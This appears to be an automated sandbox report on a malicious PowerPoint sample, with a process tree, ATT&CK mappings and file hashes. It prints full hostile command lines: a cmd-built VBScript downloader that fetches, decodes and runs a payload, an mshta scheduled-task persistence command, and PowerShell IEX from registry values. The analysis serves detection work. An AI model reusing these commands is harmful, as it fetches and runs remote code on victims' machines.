PID 296 wrote to memory of 1160	296	cmd.exe	WScript.exe
PID 296 wrote to memory of 1160	296	cmd.exe	WScript.exe
PID 296 wrote to memory of 1160	296	cmd.exe	WScript.exe
PID 884 wrote to memory of 2084	884	MSHTA.exe	powershell.exe
PID 884 wrote to memory of 2084	884	MSHTA.exe	powershell.exe
PID 884 wrote to memory of 2084	884	MSHTA.exe	powershell.exe
PID 884 wrote to memory of 2084	884	MSHTA.exe	powershell.exe
PID 884 wrote to memory of 2120	884	MSHTA.exe	taskkill.exe
PID 884 wrote to memory of 2120	884	MSHTA.exe	taskkill.exe
PID 884 wrote to memory of 2120	884	MSHTA.exe	taskkill.exe
PID 884 wrote to memory of 2120	884	MSHTA.exe	taskkill.exe
PID 884 wrote to memory of 2132	884	MSHTA.exe	taskkill.exe
PID 884 wrote to memory of 2132	884	MSHTA.exe	taskkill.exe
PID 884 wrote to memory of 2132	884	MSHTA.exe	taskkill.exe
PID 884 wrote to memory of 2132	884	MSHTA.exe	taskkill.exe

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\sample.ppt"
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1116

C:\Windows\SysWOW64\MSHTA.exe
MSHTA http://12384928198391823%12384928198391823@j.mp/dokdwkkwkdwkxxxdcjcdkwk
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\FIX.VBS", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
3⤵
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
4⤵
- Blocklisted process makes network request
- Modifies system certificate store
PID:1160

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/42.html""\"", 0 : window.close"\")
3⤵
- Creates scheduled task(s)
PID:1276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\SysWOW64\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:1820

C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
winword
2⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1908

C:\Windows\SysWOW64\ping.exe
ping 127.0.0.1
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:1280

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

3

T1112

Install Root Certificate

1

T1130

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
8246648f63613d2c0f5e5a9f27c32aa0

SHA1
0ecf2a0c9c385b19b185da75b39b0e806f1e84d9

SHA256
1bc935b85500e513dbff8830c1329fd60c18bba7378fabe25ebbed3227899683

SHA512
d48febc8449b7fbc2fadd7c5066cf4c62c87fd8469c262f1ea2485c3c67b50ab2a195f131942701b470614db92c447ecd49e7cf42bbe8170dc636feb522bf390

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
2a35024af1b5856d7d79ef11fbbd228e

SHA1
de58beba122edc50a4697f77dde617c7fa13a938

SHA256
dd5006ad435ad4d953824292defcc3e42e5908b14ff6428f04e442bdc8d26664

SHA512
e2748bd914d8faed3a35e647be3956c886da7577549a7ddc509d0ac230767e52aaf38853bce8595169a1beb5662eeb65c0bb03e1d1492ec6019b5ba70636f2d2

Download Submit
C:\Users\Public\SiggiaW.vbs
MD5
49744d1b597f85a2691eeeccab3f5ec9

SHA1
53be659955bdf552d103ddd2251f97920c4830bd

SHA256
09af8affea2e91779fc5bd8e45c8eb4274f6cb0fe78cb96c77586f988958fb6f

SHA512
7d6036c802670bca691b26e3f22badfce85641354d67d460d38ff26edef248bcc6a51bf81406b11f2b6972525f8af6dfdcc26f298438280d001b03292f767e3f

Download Submit
memory/296-17-0x0000000000000000-mapping.dmp

Download
memory/296-18-0x00000000760D1000-0x00000000760D3000-memory.dmp

Filesize
8KB

Download
memory/884-8-0x0000000000000000-mapping.dmp

Download
memory/932-9-0x000007FEF7510000-0x000007FEF778A000-memory.dmp

Filesize
2.5MB

Download
memory/1116-5-0x0000000000000000-mapping.dmp

Download
memory/1116-6-0x000007FEFBA51000-0x000007FEFBA53000-memory.dmp

Filesize
8KB

Download
memory/1160-43-0x0000000002540000-0x0000000002544000-memory.dmp

Filesize
16KB

Download
memory/1160-22-0x0000000000000000-mapping.dmp

Download
memory/1276-20-0x0000000000000000-mapping.dmp

Download
memory/1280-15-0x0000000000000000-mapping.dmp

Download
memory/1784-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1784-16-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1784-2-0x0000000073BA1000-0x0000000073BA5000-memory.dmp

Filesize
16KB

Download
memory/1784-7-0x0000000001E00000-0x0000000001E01000-memory.dmp

Filesize
4KB

Download
memory/1784-3-0x0000000071251000-0x0000000071253000-memory.dmp

Filesize
8KB

Download
memory/1820-10-0x0000000000000000-mapping.dmp

Download
memory/1908-11-0x0000000000000000-mapping.dmp

Download
memory/1908-12-0x0000000068721000-0x0000000068724000-memory.dmp

Filesize
12KB

Download
memory/1964-33-0x0000000000E70000-0x0000000000E71000-memory.dmp

Filesize
4KB

Download
memory/1964-38-0x00000000048C0000-0x00000000048C1000-memory.dmp

Filesize
4KB

Download
memory/1964-19-0x0000000000000000-mapping.dmp

Download
memory/1964-28-0x0000000067750000-0x0000000067E3E000-memory.dmp

Filesize
6.9MB

Download
memory/1964-40-0x00000000048C2000-0x00000000048C3000-memory.dmp

Filesize
4KB

Download
memory/2084-41-0x0000000002680000-0x0000000002681000-memory.dmp

Filesize
4KB

Download
memory/2084-47-0x000000007EF20000-0x000000007EF21000-memory.dmp

Filesize
4KB

Download
memory/2084-25-0x0000000000000000-mapping.dmp

Download
memory/2084-37-0x0000000004A60000-0x0000000004A61000-memory.dmp

Filesize
4KB

Download
memory/2084-39-0x0000000004A62000-0x0000000004A63000-memory.dmp

Filesize
4KB

Download
memory/2084-31-0x0000000067750000-0x0000000067E3E000-memory.dmp

Filesize
6.9MB

Download
memory/2084-79-0x0000000006A80000-0x0000000006A81000-memory.dmp

Filesize
4KB

Download
memory/2084-78-0x0000000006A70000-0x0000000006A71000-memory.dmp

Filesize
4KB

Download
memory/2084-44-0x00000000049F0000-0x00000000049F1000-memory.dmp

Filesize
4KB

Download
memory/2084-35-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

Filesize
4KB

Download
memory/2084-49-0x00000000062F0000-0x00000000062F1000-memory.dmp

Filesize
4KB

Download
memory/2084-54-0x00000000049B0000-0x00000000049B1000-memory.dmp

Filesize
4KB

Download
memory/2084-55-0x0000000006380000-0x0000000006381000-memory.dmp

Filesize
4KB

Download
memory/2084-62-0x00000000064C0000-0x00000000064C1000-memory.dmp

Filesize
4KB

Download
memory/2084-63-0x0000000006500000-0x0000000006501000-memory.dmp

Filesize
4KB

Download
memory/2084-64-0x00000000066D0000-0x00000000066D1000-memory.dmp

Filesize
4KB

Download
memory/2120-26-0x0000000000000000-mapping.dmp

Download
memory/2132-27-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads